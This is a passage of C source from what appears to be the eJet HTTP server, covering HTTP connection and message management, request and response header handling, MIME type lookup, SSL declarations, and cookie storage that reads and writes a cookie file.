EnterCriticalSection(&mgmt->conCS);
pcon = ht_get(mgmt->con_table, &conid);
LeaveCriticalSection(&mgmt->conCS);
return pcon;
}
void * http_mgmt_con_del (void * vmgmt, ulong conid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->conCS);
pcon = ht_delete(mgmt->con_table, &conid);
LeaveCriticalSection(&mgmt->conCS);
return pcon;
}
int http_mgmt_con_num (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int num = 0;
if (!mgmt) return 0;
EnterCriticalSection(&mgmt->conCS);
num = ht_num(mgmt->con_table);
LeaveCriticalSection(&mgmt->conCS);
return num;
}
void * http_msg_fetch (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt) return NULL;
msg = bpool_fetch(mgmt->msg_pool);
if (!msg) return NULL;
EnterCriticalSection(&mgmt->msgidCS);
msg->msgid = mgmt->msgid++;
if (msg->msgid == 0) msg->msgid = mgmt->msgid++;
LeaveCriticalSection(&mgmt->msgidCS);
msg->httpmgmt = mgmt;
msg->pcore = mgmt->pcore;
http_msg_init(msg);
http_msg_init_method(msg);
http_msg_mgmt_add(mgmt, msg);
return msg;
}
int http_msg_num (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int num = 0;
if (!mgmt) return 0;
EnterCriticalSection(&mgmt->msgtableCS);
num = ht_num(mgmt->msg_table);
LeaveCriticalSection(&mgmt->msgtableCS);
return num;
}
void * http_get_json_conf (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->cnfjson;
}
void * http_get_mimemgmt (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->mimemgmt;
}
void * http_get_frame_pool (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->frame_pool;
}
void * http_get_epump (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->pcore;
}
int http_set_epump (void * vmgmt, void * pcore)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->pcore = pcore;
return 0;
}
char * http_get_mime (void * vmgmt, char * file, uint32 * mimeid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
char * p = NULL;
char * pend = NULL;
char * poct = NULL;
char ext[65];
int ret = 0;
if (!mgmt || !file) return "application/octet-stream";
p = str_trim(file); pend = p + strlen(p);
poct = rskipTo(pend-1, pend-p, ".", 1);
if (poct < p) return "application/octet-stream";
str_secpy(ext, sizeof(ext)-1, poct, pend - poct);
ret = mime_type_get_by_extname(mgmt->appmime, ext, &p, mimeid, NULL);
if (ret < 0 || !p || strlen(p) < 1) {
mime_type_get_by_extname(mgmt->mimemgmt, ext, &p, mimeid, NULL);
}
return p;
}
int http_conf_mime_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
void * mimeobj = NULL;
char key[64];
char * plist[8];
int plen[8];
int i, num, j, ret;
char * mime;
int mimelen;
char * ext;
int extlen;
uint32 mimeid;
uint32 appid;
if (!mgmt) return -1;
if (mgmt->appmime == NULL)
mgmt->appmime = mime_type_alloc(500);
sprintf(key, "http.mime types");
json_mget_value(mgmt->cnfjson, key, strlen(key), NULL, NULL, &mimeobj);
if (!mimeobj) return -100;
num = json_num(mimeobj);
for (i = 0; i < num; i++) {
json_iter(mimeobj, i, (void **)&mime, &mimelen, (void **)&ext, &extlen, NULL);
if (!mime || mimelen <= 0 || !ext || extlen <= 0)
continue;
ret = string_tokenize(ext, extlen, " \t,", 3, (void **)plist, plen, 8);
for (j = 0; j < ret; j++) {
if (plist[j] == NULL || plen[j] <= 0)
continue;
str_secpy(key, sizeof(key)-1, plist[j], plen[j]);
mime_type_get_by_mime(mgmt->mimemgmt, mime, NULL, &mimeid, &appid);
mime_type_add(mgmt->appmime, mime, key, mimeid, appid);
}
}
tolog(1, "eJet - MIME type resource allocated.\n");
return 0;
}
int http_conf_mime_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
if (mgmt->appmime) {
mime_type_free(mgmt->appmime);
mgmt->appmime = NULL;
}
tolog(1, "eJet - MIME type resource freed.\n");
return 0;
}
<|start_filename|>include/http_dispdir.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_DISPDIR_H_
#define _HTTP_DISPDIR_H_
#ifdef __cplusplus
extern "C" {
#endif
int DisplayDirectory (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_header.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
typedef struct comm_strkey_ {
char * name;
int namelen;
} CommStrkey;
HeaderUnit * hunit_alloc ()
{
HeaderUnit * hunit = NULL;
hunit = kzalloc(sizeof(*hunit));
return hunit;
}
int hunit_free (void * vhunit)
{
HeaderUnit * hunit = (HeaderUnit *)vhunit;
if (!hunit) return -1;
kfree(hunit);
return 0;
}
void hunit_void_free (void * vhunit)
{
hunit_free(vhunit);
}
int hunit_cmp_hunit_by_name(void * a, void * b)
{
HeaderUnit * hua = (HeaderUnit *)a;
HeaderUnit * hub = (HeaderUnit *)b;
int len = 0;
int ret = 0;
if (!a || !b) return -1;
if (hua->namelen != hub->namelen) {
len = (hua->namelen > hub->namelen) ? hub->namelen : hua->namelen;
if (len <= 0) {
if (hua->namelen > 0) return 1;
else return -1;
}
ret = str_ncasecmp(HUName(hua), HUName(hub), len);
if (ret == 0) {
if (hua->namelen > hub->namelen)
return 1;
else return -1;
} else return ret;
}
if (hua->namelen <= 0) return 0;
return str_ncasecmp(HUName(hua), HUName(hub), hua->namelen);
}
ulong hunit_hash_func (void * vkey)
{
CommStrkey * key = (CommStrkey *)vkey;
static long hunit_mask = ~0U << 26;
ulong ret = 0;
uint8 * p = NULL;
int i;
if (!key) return 0;
p = (uint8 *)key->name;
for (i = 0; i < key->namelen; i++) {
ret = (ret & hunit_mask) ^ (ret << 6) ^ (tolower(*p));
p++;
}
return ret;
}
int hunit_cmp_key (void * a, void * b)
{
HeaderUnit * unit = (HeaderUnit *)a;
CommStrkey * key = (CommStrkey *)b;
int len = 0, ret;
if (!unit || !key) return -1;
if (unit->namelen != key->namelen) {
len = (unit->namelen > key->namelen) ? key->namelen : unit->namelen;
if (len <= 0) {
if (unit->namelen > 0) return 1;
return -1;
}
ret = str_ncasecmp(HUName(unit), key->name, len);
if (ret == 0) {
if (unit->namelen > key->namelen)
return 1;
else
return -1;
} else
return ret;
}
len = unit->namelen;
if (len <= 0) return 0;
return str_ncasecmp(HUName(unit), key->name, len);
}
int hunit_set_hashfunc (hashtab_t * htab)
{
if (!htab) return -1;
ht_set_hash_func(htab, hunit_hash_func);
return 0;
}
int hunit_add (hashtab_t * htab, char * name, int namelen, void * value)
{
CommStrkey key;
if (!htab) return -1;
if (!name || namelen <= 0) return -2;
if (!value) return -3;
key.name = name;
key.namelen = namelen;
return ht_set(htab, &key, value);
}
HeaderUnit * hunit_get (hashtab_t * htab, char * name, int namelen)
{
CommStrkey key;
HeaderUnit * punit = NULL;
if (!htab) return NULL;
if (!name || namelen <= 0) return NULL;
key.name = name;
key.namelen = namelen;
punit = (HeaderUnit *)ht_get(htab, &key);
return punit;
}
HeaderUnit * hunit_del (hashtab_t * htab, char * name, int namelen)
{
CommStrkey key;
HeaderUnit * punit = NULL;
if (!htab) return NULL;
if (!name || namelen <= 0) return NULL;
key.name = name;
key.namelen = namelen;
punit = (HeaderUnit *)ht_delete(htab, &key);
return punit;
}
HeaderUnit * hunit_get_from_list (arr_t * hlist, char * name, int namelen)
{
CommStrkey key;
HeaderUnit * punit = NULL;
if (!hlist) return NULL;
if (!name || namelen <= 0) return NULL;
key.name = name;
key.namelen = namelen;
punit = (HeaderUnit *)arr_find_by(hlist, &key, hunit_cmp_key);
return punit;
}
int http_header_add (void * vmsg, int type, char * name, int namelen, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * phu = NULL;
HeaderUnit * punit = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
frame_p frame = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
frame = msg->req_header_stream;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
frame = msg->res_header_stream;
}
punit = hunit_get (header_table, name, namelen);
while (punit) {
phu = punit; punit = punit->next;
if (phu->valuelen == valuelen &&
str_ncasecmp(HUValue(phu), value, valuelen) ==0)
{
phu->frame = frame;
phu->name = name;
phu->namepos = HUPos(frame, name);
phu->namelen = namelen;
phu->value = value;
phu->valuepos = HUPos(frame, value);
phu->valuelen = valuelen;
return 0;
}
}
punit = bpool_fetch(mgmt->header_unit_pool);
if (!punit) {
tolog(1, "http_header_add: fetchUnit null. type=%d name=%s\n", type, name);
return -5;
}
punit->frame = frame;
punit->name = name;
punit->namepos = HUPos(frame, name);
punit->namelen = namelen;
punit->value = value;
punit->valuepos = HUPos(frame, value);
punit->valuelen = valuelen;
punit->next = NULL;
if (!phu)
hunit_add(header_table, name, namelen, punit);
else {
phu->next = punit;
}
arr_insert_by(header_list, punit, hunit_cmp_hunit_by_name);
return 0;
}
int http_header_del (void * vmsg, int type, char * name, int namelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * phu = NULL;
HeaderUnit * punit = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
}
phu = hunit_del (header_table, name, namelen);
while (phu) {
punit = phu; phu = phu->next;
if (punit && arr_delete_ptr(header_list, punit)) {
bpool_recycle(mgmt->header_unit_pool, punit);
}
}
if (punit)
return 0;
return -100;
}
int http_header_delall (void * vmsg, int type)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
int i, num;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
frame_p frame = NULL;
if (!msg) return -1;
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
frame = msg->req_header_stream;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
frame = msg->res_header_stream;
}
num = arr_num(header_list);
for (i = 0; i < num; i++) {
unit = arr_value(header_list, i);
if (!unit) continue;
bpool_recycle(mgmt->header_unit_pool, unit);
}
arr_zero(header_list);
ht_zero(header_table);
frame_empty(frame);
return 0;
}
HeaderUnit * http_header_get (void * vmsg, int type, char * name, int namelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
if (!msg) return NULL;
if (!name) return NULL;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return NULL;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
}
punit = hunit_get (header_table, name, namelen);
if (!punit)
punit = hunit_get_from_list (header_list, name, namelen);
return punit;
}
int http_header_get_int (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtod(HUValue(punit), NULL);
}
return 0;
}
uint32 http_header_get_uint32 (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoul(HUValue(punit), NULL, 10);
}
return 0;
}
long http_header_get_long (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtol(HUValue(punit), NULL, 10);
}
return 0;
}
ulong http_header_get_ulong (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoul(HUValue(punit), NULL, 10);
}
return 0;
}
int64 http_header_get_int64 (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoll(HUValue(punit), NULL, 10);
}
return 0;
}
uint64 http_header_get_uint64 (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoull(HUValue(punit), NULL, 10);
}
return 0;
}
HeaderUnit * http_header_get_index (void * vmsg, int type, int index)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
int num;
arr_t * header_list = NULL;
if (!msg) return NULL;
if (type == 0) { //REQUEST
header_list = msg->req_header_list;
} else {
header_list = msg->res_header_list;
}
num = arr_num(header_list);
if (index < 0 || index >= num) return NULL;
punit = arr_value(header_list, index);
return punit;
}
int http_header_append (void * vmsg, int type, char * name, int namelen, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * punit = NULL;
HeaderUnit * phu = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
frame_p frame = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
if (value && valuelen < 0) valuelen = str_len(value);
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
frame = msg->req_header_stream;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
frame = msg->res_header_stream;
}
punit = hunit_get (header_table, name, namelen);
while (punit) {
phu = punit; punit = punit->next;
if (phu->valuelen == valuelen &&
str_ncasecmp(HUValue(phu), value, valuelen) ==0)
{
return 0;
}
}
punit = bpool_fetch(mgmt->header_unit_pool);
if (!punit) {
return -5;
}
punit->frame = frame;
punit->namepos = frameL(frame);
frame_put_nlast(frame, name, namelen);
punit->name = (char *)frameP(frame) + punit->namepos;
punit->namelen = namelen;
frame_append(frame, ": ");
if (value && valuelen > 0) {
punit->valuepos = frameL(frame);
frame_put_nlast(frame, value, valuelen);
punit->value = (char *)frameP(frame) + punit->valuepos;
punit->valuelen = valuelen;
} else {
punit->valuepos = 0;
punit->value = NULL;
punit->valuelen = 0;
}
frame_append(frame, "\r\n");
punit->next = NULL;
if (!phu)
hunit_add(header_table, name, namelen, punit);
else
phu->next = punit;
arr_insert_by(header_list, punit, hunit_cmp_hunit_by_name);
if (type == 0) { //REQUEST
if (msg->req_header_stream == NULL)
msg->req_header_stream = frame;
} else {
if (msg->res_header_stream == NULL)
msg->res_header_stream = frame;
}
return 0;
}
/* date string defined by RFC 822, updated by RFC 1123
Sun, 17 Dec 2000 08:21:33 GMT */
int http_header_append_date (void * vmsg, int type, char * name, int namelen, time_t dtval)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
struct tm gmtval;
static char * monthname[12] = {
"Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"};
static char * weekname[7] = {"Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"};
char value[48];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
gmtval = *gmtime((time_t *)&dtval);
sprintf(value, "%s, %02d %s %4d %02d:%02d:%02d GMT",
weekname[gmtval.tm_wday],
gmtval.tm_mday,
monthname[gmtval.tm_mon],
gmtval.tm_year + 1900,
gmtval.tm_hour,
gmtval.tm_min,
gmtval.tm_sec);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_int (void * vmsg, int type, char * name, int namelen, int ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%d", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_uint32 (void * vmsg, int type, char * name, int namelen, uint32 ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%u", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_long (void * vmsg, int type, char * name, int namelen, long ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%ld", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_ulong (void * vmsg, int type, char * name, int namelen, ulong ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%lu", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_int64 (void * vmsg, int type, char * name, int namelen, int64 ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[128];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
#if defined(_WIN32) || defined(_WIN64)
sprintf(value, "%I64d", ival);
#else
sprintf(value, "%lld", ival);
#endif
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_uint64 (void * vmsg, int type, char * name, int namelen, uint64 ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[128];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
#if defined(_WIN32) || defined(_WIN64)
sprintf(value, "%I64u", ival);
#else
sprintf(value, "%llu", ival);
#endif
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_entity_header_parse (void * vmsg, int type, char * pbyte, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pend = NULL;
char * pcolon = NULL;
char * poct = NULL;
char * name = NULL;
char * value = NULL;
int namelen = 0, valuelen = 0;
if (!msg) return -1;
if (!pbyte || len < 1) return -2;
pend = pbyte + len;
pbyte = skipOver(pbyte, len, " \t\r\n", 3);
if (pbyte >= pend) return -100;
name = pbyte;
pcolon = skipTo(pbyte, pend-pbyte, ":", 1);
if (!pcolon || pcolon >= pend) return -101;
poct = rskipOver(pcolon-1, pcolon-name, " \t", 2);
if (poct < name) return -102;
namelen = poct - name + 1;
poct = skipOver(pcolon+1, pend-pcolon-1, " \t\r", 3);
if (poct >= pend) return -200;
value = poct;
poct = rskipOver(pend-1, pend-poct, " \t\r\n", 4);
if (poct < value) {value = NULL; valuelen = 0; }
else valuelen = poct - value + 1;
http_header_append(msg, type, name, namelen, value, valuelen);
return 0;
}
<|start_filename|>include/http_ssl.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SSL_H_
#define _HTTP_SSL_H_
#ifdef HAVE_OPENSSL
#include <openssl/ssl.h>
#include <openssl/err.h>
#endif
#ifdef __cplusplus
extern "C" {
#endif
#ifdef HAVE_OPENSSL
int http_ssl_library_init ();
void * http_ssl_server_ctx_init (char * cert, char * prikey, char * cacert);
void * http_ssl_client_ctx_init (char * cert, char * prikey, char * cacert);
int http_ssl_ctx_free (void * vctx);
SSL * http_ssl_new (SSL_CTX * ctx, void * vcon);
int http_ssl_free (SSL * ssl);
void * http_con_from_ssl (SSL * ssl);
/* before SSL handshake, TCP sends 'Client Hello' with servername to web server.
The servername will be received and indicated to callback for appropriate
certificate and private key, called SNI mechanism in TLS spec. Multiple
certificates can be used for different host-name in one listen port. */
int http_ssl_servername_select (SSL * ssl, int * ad, void * arg);
#endif
int http_ssl_accept (void * vcon);
int http_ssl_connect (void * vcon);
int http_con_read (void * vcon, frame_p frm, int * num, int * err);
int http_con_writev (void * vcon, void * piov, int iovcnt, int * num, int * err);
int http_con_sendfile (void * vcon, int filefd, int64 pos, int64 size, int * num, int * err);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_handle.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_HANDLE_H_
#define _HTTP_HANDLE_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_msg_handle (void * vcon, void * vmsg);
int http_connect_process (void * vcon, void * vmsg);
int http_request_process (void * vcon, void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_cookie.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_cookie.h"
void * http_cookie_alloc ()
{
cookie_t * ckie = NULL;
ckie = kzalloc(sizeof(*ckie));
if (!ckie) return NULL;
ckie->createtime = time(0);
return ckie;
}
void http_cookie_free (void * vckie)
{
cookie_t * ckie = (cookie_t *)vckie;
if (!ckie) return;
if (ckie->name) {
kfree(ckie->name);
ckie->name = NULL;
}
if (ckie->value) {
kfree(ckie->value);
ckie->name = NULL;
}
if (ckie->path) {
kfree(ckie->path);
ckie->path = NULL;
}
if (ckie->domain) {
kfree(ckie->domain);
ckie->domain = NULL;
}
kfree(ckie);
}
void * cookie_path_alloc ()
{
cookie_path_t * ckpath = NULL;
ckpath = kzalloc(sizeof(*ckpath));
if (!ckpath) return NULL;
ckpath->cookie_list = arr_new(4);
return ckpath;
}
void cookie_path_free (void * vpath)
{
cookie_path_t * ckpath = (cookie_path_t *)vpath;
if (!ckpath) return;
if (ckpath->cookie_list) {
arr_free(ckpath->cookie_list);
ckpath->cookie_list = NULL;
}
kfree(ckpath);
}
void * cookie_domain_alloc ()
{
cookie_domain_t * ckdomain = NULL;
ckdomain = kzalloc(sizeof(*ckdomain));
if (!ckdomain) return NULL;
ckdomain->cookie_path_trie = actrie_init(128, NULL, 0);
ckdomain->cookie_path_list = arr_new(4);
return ckdomain;
}
void cookie_domain_free (void * vdomain)
{
cookie_domain_t * ckdomain = (cookie_domain_t *)vdomain;
if (!ckdomain) return;
if (ckdomain->cookie_path_trie) {
actrie_free(ckdomain->cookie_path_trie);
ckdomain->cookie_path_trie = NULL;
}
if (ckdomain->cookie_path_list) {
arr_pop_free(ckdomain->cookie_path_list, cookie_path_free);
ckdomain->cookie_path_list = NULL;
}
kfree(ckdomain);
}
int cookie_domain_cmp_name (void * a, void * b)
{
cookie_domain_t * ckdomain = (cookie_domain_t *)a;
ckstr_t * str = (ckstr_t *)b;
int len = 0;
int ret = 0;
if (!ckdomain) return -1;
if (!str || str->len <= 0) return 1;
ret = strncasecmp(ckdomain->domain, str->p, str->len);
if (ret == 0) {
if ((len = strlen(ckdomain->domain)) == str->len)
return 0;
else if (len > str->len)
return 1;
else
return -1;
}
return ret;
}
ulong cookie_domain_hash (void * vkey)
{
ckstr_t * key = (ckstr_t *)vkey;
if (!key) return 0;
return string_hash(key->p, key->len, 0);
}
void * cookie_domain_path_get (void * vdom, char * path, int pathlen)
{
cookie_domain_t * ckdomain = (cookie_domain_t *)vdom;
cookie_path_t * ckpath = NULL;
int i, num;
if (!ckdomain) return NULL;
if (!path) return NULL;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return NULL;
num = arr_num(ckdomain->cookie_path_list);
for (i = 0; i < num; i++) {
ckpath = arr_value(ckdomain->cookie_path_list, i);
if (!ckpath) continue;
if (strncasecmp(ckpath->path, path, pathlen) == 0 && strlen(ckpath->path) == pathlen)
return ckpath;
}
return NULL;
}
void * cookie_mgmt_alloc (void * vhttpmgmt, char * ckiefile)
{
CookieMgmt * mgmt = NULL;
mgmt = kzalloc(sizeof(*mgmt));
if (!mgmt) return NULL;
mgmt->httpmgmt = vhttpmgmt;
InitializeCriticalSection(&mgmt->cookieCS);
mgmt->domain_trie = actrie_init(128, NULL, 1);
mgmt->domain_table = ht_new(128, cookie_domain_cmp_name);
ht_set_hash_func(mgmt->domain_table, cookie_domain_hash);
mgmt->cookie_list = arr_new(4);
mgmt->cookie_file = ckiefile;
cookie_mgmt_read(mgmt, ckiefile);
cookie_mgmt_scan(mgmt);
tolog(1, "eJet - Cookie storage %s init\n", ckiefile);
return mgmt;
}
void cookie_mgmt_free (void * vmgmt)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
if (!mgmt) return;
DeleteCriticalSection(&mgmt->cookieCS);
if (mgmt->domain_table) {
ht_free_all(mgmt->domain_table, cookie_domain_free);
mgmt->domain_table = NULL;
}
if (mgmt->domain_trie) {
actrie_free(mgmt->domain_trie);
mgmt->domain_trie = NULL;
}
if (mgmt->cookie_list) {
arr_pop_free(mgmt->cookie_list, http_cookie_free);
mgmt->cookie_list = NULL;
}
if (mgmt->scan_timer) {
iotimer_stop(mgmt->scan_timer);
mgmt->scan_timer = NULL;
}
kfree(mgmt);
tolog(1, "eJet - Cookie resource freed.\n");
}
void * cookie_mgmt_domain_get (void * vmgmt, char * domain, int domainlen)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
ckstr_t str = ckstr_init(domain, domainlen);
cookie_domain_t * domobj = NULL;
if (!mgmt) return NULL;
if (!domain) return NULL;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return NULL;
domobj = ht_get(mgmt->domain_table, &str);
return domobj;
}
int cookie_mgmt_domain_set (void * vmgmt, char * domain, int domainlen, void * domobj)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
ckstr_t str = ckstr_init(domain, domainlen);
if (!mgmt) return -1;
if (!domain) return -2;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return -3;
if (!domobj) return -4;
ht_set(mgmt->domain_table, &str, domobj);
return 0;
}
int cookie_mgmt_read (void * vmgmt, char * cookiefile)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
FILE * fp = NULL;
char buf[4096];
char * p = NULL;
int len = 0;
if (!mgmt) return -1;
if (!cookiefile || !file_exist(cookiefile))
return -2;
fp = fopen(cookiefile, "r+");
if (!fp) return -3;
mgmt->cookie_file = cookiefile;
buf[0] = '\0';
for ( ; !feof(fp); ) {
fgets(buf, sizeof(buf)-1, fp);
p = str_trim(buf);
len = strlen(p);
if (len <= 0 || *p == '#')
continue;
cookie_mgmt_parse(mgmt, p, len, "", 0);
}
if (fp) fclose(fp);
return 0;
}
int cookie_mgmt_write (void * vmgmt, char * cookiefile)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * ckie = NULL;
FILE * fp = NULL;
frame_p frm = NULL;
char buf[64];
int i, num;
int j, pathnum;
int k, cknum;
if (!mgmt) return -1;
if (!cookiefile) cookiefile = mgmt->cookie_file;
fp = fopen(cookiefile, "w");
if (!fp) return -3;
frm = frame_new(4096);
EnterCriticalSection(&mgmt->cookieCS);
num = ht_num(mgmt->domain_table);
for (i = 0; i < num; i++) {
ckdomain = ht_value(mgmt->domain_table, i);
if (!ckdomain) continue;
pathnum = arr_num(ckdomain->cookie_path_list);
for (j = 0; j < pathnum; j++) {
ckpath = arr_value(ckdomain->cookie_path_list, j);
if (!ckpath) continue;
cknum = arr_num(ckpath->cookie_list);
for (k = 0; k < cknum; k++) {
ckie = arr_value(ckpath->cookie_list, k);
if (!ckie || !ckie->name || ckie->namelen <= 0) continue;
if (!ckie->domain || ckie->domainlen <= 0) continue;
frame_empty(frm);
frame_appendf(frm, "%s=%s;", ckie->name, ckie->value ? ckie->value : "");
if (ckie->expire > 0) {
str_time2gmt(&ckie->expire, buf, sizeof(buf)-1, 0);
frame_appendf(frm, " Expires=%s;", buf);
}
if (ckie->maxage > 0) {
frame_appendf(frm, " Max-Age=%d;", ckie->maxage);
}
if (ckie->path && ckie->pathlen > 0)
frame_appendf(frm, " Path=%s;", ckie->path);
else
frame_appendf(frm, " Path=/;");
frame_appendf(frm, " Domain=%s;", ckie->domain);
if (ckie->httponly)
frame_appendf(frm, " HTTPOnly;");
if (ckie->secure)
frame_appendf(frm, " Secure;");
if (ckie->samesite == 1 || ckie->samesite == 2)
frame_appendf(frm, " SameSite=%s;", ckie->samesite == 1 ? "Strict" : "Lax");
